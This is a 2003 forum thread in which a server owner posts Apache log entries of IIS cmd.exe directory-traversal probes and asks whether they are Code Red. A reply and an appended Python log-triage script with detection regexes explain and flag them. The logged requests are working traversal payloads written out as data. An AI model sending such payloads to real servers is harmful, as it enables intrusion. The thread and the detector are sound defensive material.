Code RED worm attack?


notoriousformula
10-15-2003, 09:33 PM
Hello all, I have an Apache server set up to share hardware pics on BBS/forums; it's up 24/7. Today I found some unusual entries in the access log. Can somebody please interpret these for me:

Is this a Code RED worm attack?

TIA! :)

24.211.234.87 - - [15/Oct/2003:16:55:43 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
24.211.234.87 - - [15/Oct/2003:16:55:44 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
24.211.234.87 - - [15/Oct/2003:16:55:48 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
24.211.234.87 - - [15/Oct/2003:16:55:50 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
24.211.234.87 - - [15/Oct/2003:16:55:51 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
24.211.234.87 - - [15/Oct/2003:16:55:52 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
24.211.234.87 - - [15/Oct/2003:16:55:53 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
24.211.234.87 - - [15/Oct/2003:16:55:57 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
24.211.234.87 - - [15/Oct/2003:16:55:58 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
24.211.234.87 - - [15/Oct/2003:16:55:59 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
24.211.234.87 - - [15/Oct/2003:16:56:00 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
24.211.234.87 - - [15/Oct/2003:16:56:01 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
24.211.234.87 - - [15/Oct/2003:16:56:02 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
24.211.234.87 - - [15/Oct/2003:16:56:03 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
24.211.234.87 - - [15/Oct/2003:16:56:04 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
24.211.234.87 - - [15/Oct/2003:16:56:05 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306

Player0
10-15-2003, 10:37 PM
I can't confirm whether it's a Code Red attack or not, as I'm not familiar with what that does.

However, it does appear to be some sort of exploit script meant to find holes on NT based servers.

It seems to be targeting IIS servers more specifically. Your server returned 404 and 400 errors to the script, so that's good. If you ever see one of those with a code 200 or similar, that could be bad.

Make SURE you secure your Windows server. There are lots of tricks and things you need to do.
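To put Player0's advice into practice, here is an added example (not from either poster) that parses Apache common-log lines, flags the request shapes seen in the thread (root.exe/cmd.exe probes, `..%255c`, `..%c1%1c`-style and `%%` traversal encodings), and groups hits per source IP, marking any probe that got a 2xx. The signature names, the regexes and the two extra sample lines are my own constructions.

```python
import re
from collections import Counter
# Apache common log format: ip ident user [time] "method path proto" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$')
# Request signatures taken from the thread: IIS command-shell probes plus
# double-encoded, overlong-UTF-8 and malformed traversal sequences (names are mine).
PROBE_PATTERNS = [
    ("iis-cmd-shell", re.compile(r"/(root|cmd)\.exe", re.I)),
    ("double-encoded-traversal", re.compile(r"\.\.%25(5c|2f)", re.I)),
    ("overlong-utf8-traversal", re.compile(r"\.\.%c[01]%[0-9a-f]{2}", re.I)),
    ("malformed-escape", re.compile(r"%%")),
]
# Constructed sample: the first four lines are from the thread; the last two are
# made up (RFC 5737 addresses) to show a benign request and a probe answered with 200.
SAMPLE_LOG = """\
24.211.234.87 - - [15/Oct/2003:16:55:43 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
24.211.234.87 - - [15/Oct/2003:16:55:51 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
24.211.234.87 - - [15/Oct/2003:16:55:58 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
24.211.234.87 - - [15/Oct/2003:16:56:02 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
192.0.2.10 - - [15/Oct/2003:17:01:12 -0700] "GET /pics/board1.jpg HTTP/1.1" 200 51234
198.51.100.7 - - [15/Oct/2003:17:03:40 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 1432
"""

def parse_line(line):
    m = LOG_RE.match(line.strip())  # None for lines that are not common-log format
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry

def classify(entry):
    # Names of every signature the request path matches; empty list means benign.
    return [name for name, rx in PROBE_PATTERNS if rx.search(entry["path"])]

def triage(lines):
    """Group probe hits per source IP; 'succeeded' is True if any probe got a 2xx."""
    report = {}
    for line in lines:
        entry = parse_line(line)
        if entry is None or not (sigs := classify(entry)):
            continue
        r = report.setdefault(entry["ip"], {"hits": 0, "statuses": Counter(), "sigs": set(), "succeeded": False})
        r["hits"] += 1
        r["statuses"][entry["status"]] += 1
        r["sigs"].update(sigs)
        r["succeeded"] |= 200 <= entry["status"] < 300
    return report
```

Run `triage(SAMPLE_LOG.splitlines())` to see the thread's source grouped with 404/400 only (what Player0 calls good), while the constructed 198.51.100.7 entry is flagged `succeeded`, the case worth investigating.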